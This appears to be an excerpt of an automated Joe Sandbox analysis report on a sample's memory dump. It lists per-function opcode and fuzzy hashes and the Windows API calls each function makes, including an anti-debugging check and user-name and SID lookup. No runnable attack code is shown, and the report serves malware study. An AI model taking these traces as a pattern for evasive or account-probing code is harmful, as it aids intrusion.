                                                                                                                                                                                      • Opcode ID: e7064d21d4ac182a0d65aea7ec35a384a76db718c7dd4c9a134db3ccc53796e7
                                                                                                                                                                                      • Instruction ID: 7d40e1599155ab71fadfa5391fbf0ed601692a9432a8040bacc6ea9af4cc57f3
                                                                                                                                                                                      • Opcode Fuzzy Hash: e7064d21d4ac182a0d65aea7ec35a384a76db718c7dd4c9a134db3ccc53796e7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 70526CB09142588BEF65EB24CD59BDDBBB6AB21308F9041D9D40927382DB754FC8CF92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001DB8CA
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001DB8D4
                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001DB8E1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                      • Opcode ID: 7ccc4794923807aad41125faa269a7e671bda29aab76be54355f1602c3035bb7
                                                                                                                                                                                      • Instruction ID: 042a6d35535942ded5cb5a9a4de35fff020b3a37163793abea2595c51a0c9fc8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ccc4794923807aad41125faa269a7e671bda29aab76be54355f1602c3035bb7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031C275901328ABCB21DF64DD8978CBBB8BF18310F5041EAE41DA6290EB749F858F44
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001D77C3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                      • Opcode ID: 0adbefe1d82b7eb5bf6fd7a2f0352488cb817aad843cc7f79e51c55bfc8277f3
                                                                                                                                                                                      • Instruction ID: b555bc375f4f15816870fae41200537daf80eee609b32087f171896e98e3634e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0adbefe1d82b7eb5bf6fd7a2f0352488cb817aad843cc7f79e51c55bfc8277f3
                                                                                                                                                                                      • Instruction Fuzzy Hash: E75190B2A046158FDB28CF69D8957AEBBF0FB48324F14892AD406EB790E7749940CF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c84fb7c74bd6a99edece3247a213474b9c7b2608f5bc6ac8c4f8c677552047cd
                                                                                                                                                                                      • Instruction ID: 5f4240fef51001ac4f9555567b101b49a78e72c9e860b4f0cd5ee816f3371b29
                                                                                                                                                                                      • Opcode Fuzzy Hash: c84fb7c74bd6a99edece3247a213474b9c7b2608f5bc6ac8c4f8c677552047cd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5241A1B5C04218AFDB24DF69CC89AAABBB9AF55304F1442EEE41D93211DB349E858F10
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                      • Opcode ID: 37687113f56073990fa9555fe5626ba2b54a5ec62cf26e977b25e5e749ed3793
                                                                                                                                                                                      • Instruction ID: a99cafff84903edb3ce745f0f64bb3a9982b51b7e544e1b8a26a221732d23292
                                                                                                                                                                                      • Opcode Fuzzy Hash: 37687113f56073990fa9555fe5626ba2b54a5ec62cf26e977b25e5e749ed3793
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CA012706001408B53008F30694520D37D86B0018070500246408C4520D76440C49601
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 001C3032
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 001C3047
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 001C304A
                                                                                                                                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 001C3058
                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 001C307B
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 001C3086
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 001C3089
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 001C3099
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 001C309C
                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 001C30C6
                                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 001C30D9
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001C31D5
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 001C31DE
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001C31E3
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 001C31E6
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001C31ED
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 001C31F0
                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 001C31F5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3326663573-0
                                                                                                                                                                                      • Opcode ID: 099a740ae0e0749b81bbc70a687ae37645b8122a9cb1f5b21130dc38f6562dfb
                                                                                                                                                                                      • Instruction ID: ab1cbf0c6041fcf66718a2b7e2ae55c655b072734e47f76c7fb32270af52bfaa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 099a740ae0e0749b81bbc70a687ae37645b8122a9cb1f5b21130dc38f6562dfb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 747180B1E00249AFDB15DFA4DC85FAFBBB9EF48300F048529F915A7280DB749A45CB61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 001E13B7
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0F6D
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0F7F
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0F91
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0FA3
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0FB5
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0FC7
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0FD9
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0FEB
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E0FFD
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E100F
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E1021
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E1033
                                                                                                                                                                                        • Part of subcall function 001E0F50: _free.LIBCMT ref: 001E1045
                                                                                                                                                                                      • _free.LIBCMT ref: 001E13AC
                                                                                                                                                                                        • Part of subcall function 001DD301: HeapFree.KERNEL32(00000000,00000000,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?), ref: 001DD317
                                                                                                                                                                                        • Part of subcall function 001DD301: GetLastError.KERNEL32(?,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?,?), ref: 001DD329
                                                                                                                                                                                      • _free.LIBCMT ref: 001E13CE
                                                                                                                                                                                      • _free.LIBCMT ref: 001E13E3
                                                                                                                                                                                      • _free.LIBCMT ref: 001E13EE
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1410
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1423
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1431
                                                                                                                                                                                      • _free.LIBCMT ref: 001E143C
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1474
                                                                                                                                                                                      • _free.LIBCMT ref: 001E147B
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1498
                                                                                                                                                                                      • _free.LIBCMT ref: 001E14B0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                      • Opcode ID: 7aca27ed3962b3de04052c2b71403a7e2b3b17de6a41b7beda8a58acde9c8eed
                                                                                                                                                                                      • Instruction ID: 5b0abe2c1993177764aeac64bb079fb09131cb58e82ba96834a7a7a0236e6e95
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7aca27ed3962b3de04052c2b71403a7e2b3b17de6a41b7beda8a58acde9c8eed
                                                                                                                                                                                      • Instruction Fuzzy Hash: C3314AB1600B44BFEB21AE7AE945BAE73E9BF10360F14442AF459D6691DF31AC80C611
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 001D8972
                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 001D8999
                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 001D8AA5
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 001D8B80
                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 001D8C07
                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 001D8C22
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                                                                      • Opcode ID: 183138631344d6353f67299c42f82b519d428f1b0df9bd6635468c63c4af0fd4
                                                                                                                                                                                      • Instruction ID: 39b8f98189a6e1588cece968341340749482f429a680c4344eb949d368d4a69c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 183138631344d6353f67299c42f82b519d428f1b0df9bd6635468c63c4af0fd4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 24C17BB1800219EFCF29DFA4D881AAEBBB5BF18310F04455BE8556B352DB31E951CBA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDAF0
                                                                                                                                                                                        • Part of subcall function 001DD301: HeapFree.KERNEL32(00000000,00000000,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?), ref: 001DD317
                                                                                                                                                                                        • Part of subcall function 001DD301: GetLastError.KERNEL32(?,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?,?), ref: 001DD329
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDAFC
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB07
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB12
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB1D
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB28
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB33
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB3E
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB49
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDB57
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 3c07dcef3517ceb8ad3d5f4e18c903fd312065dabadc36e8735de9a4d4c9ac05
                                                                                                                                                                                      • Instruction ID: e8fbb1d1bb5d81948b4081229fbbed88063ca314343776a76c5dde1a39e9ec40
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c07dcef3517ceb8ad3d5f4e18c903fd312065dabadc36e8735de9a4d4c9ac05
                                                                                                                                                                                      • Instruction Fuzzy Hash: CA21B6B6900118BFCB01EFA5D881DEE7BB8BF18344B0141A6F915DB225DB32EA44CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2e427a1a5abac8d0d8da5768200439f6c44c5e469b89cc5ce594fb54890b443c
                                                                                                                                                                                      • Instruction ID: d813dae1cb9be7e0ef3e5f4b8fb68d138b8e81927ec5e487dd4c7a6a59b355ad
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e427a1a5abac8d0d8da5768200439f6c44c5e469b89cc5ce594fb54890b443c
                                                                                                                                                                                      • Instruction Fuzzy Hash: D1C1E170E04A85AFCF15DF9AC880BBEBBB2BF59318F154059E5069B392C7709941CF60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3409252457-0
                                                                                                                                                                                      • Opcode ID: e0c9f775370e076d1552a93eb19f994f6c4e17ac39245d8386d5935a166177eb
                                                                                                                                                                                      • Instruction ID: 28088c877febff69c852d4f875efbf5f2e4dd104b3449cf9c288b1715d2f0a8b
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0c9f775370e076d1552a93eb19f994f6c4e17ac39245d8386d5935a166177eb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 56515970D04B85AFEF22AF7A9881B6D77B4AF58314F04416EE45597283EBB189C0CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 001D8257
                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 001D825F
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 001D82E8
                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 001D8313
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 001D8368
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                      • Opcode ID: 4a69dbad22e7e0ead6eefaeded5ae938acc62678b2dbc2b1b34054aa74228b74
                                                                                                                                                                                      • Instruction ID: f86e8c58f853b314a0c7759423cc41f41af4c66a7738c8286f95efdf43b5d959
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a69dbad22e7e0ead6eefaeded5ae938acc62678b2dbc2b1b34054aa74228b74
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B41C634A00609EFCF11DF69C885A9EBBB5BF45314F148167E9185B392DB31EA06CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                      • Opcode ID: 545ea0ad0647203cd0053d352f886216db8de2be95532fcbe93a7c4e5d1c003a
                                                                                                                                                                                      • Instruction ID: 5adc75fd00368dd979b2a382290933a3573e90971c42e2c286f6fb0483934816
                                                                                                                                                                                      • Opcode Fuzzy Hash: 545ea0ad0647203cd0053d352f886216db8de2be95532fcbe93a7c4e5d1c003a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E121DA32E05221ABDB314B64EC85A5E77989F517B0F660512FD1BAB3D1EB30ED42C6E0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 001E10B7: _free.LIBCMT ref: 001E10DC
                                                                                                                                                                                      • _free.LIBCMT ref: 001E113D
                                                                                                                                                                                        • Part of subcall function 001DD301: HeapFree.KERNEL32(00000000,00000000,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?), ref: 001DD317
                                                                                                                                                                                        • Part of subcall function 001DD301: GetLastError.KERNEL32(?,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?,?), ref: 001DD329
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1148
                                                                                                                                                                                      • _free.LIBCMT ref: 001E1153
                                                                                                                                                                                      • _free.LIBCMT ref: 001E11A7
                                                                                                                                                                                      • _free.LIBCMT ref: 001E11B2
                                                                                                                                                                                      • _free.LIBCMT ref: 001E11BD
                                                                                                                                                                                      • _free.LIBCMT ref: 001E11C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
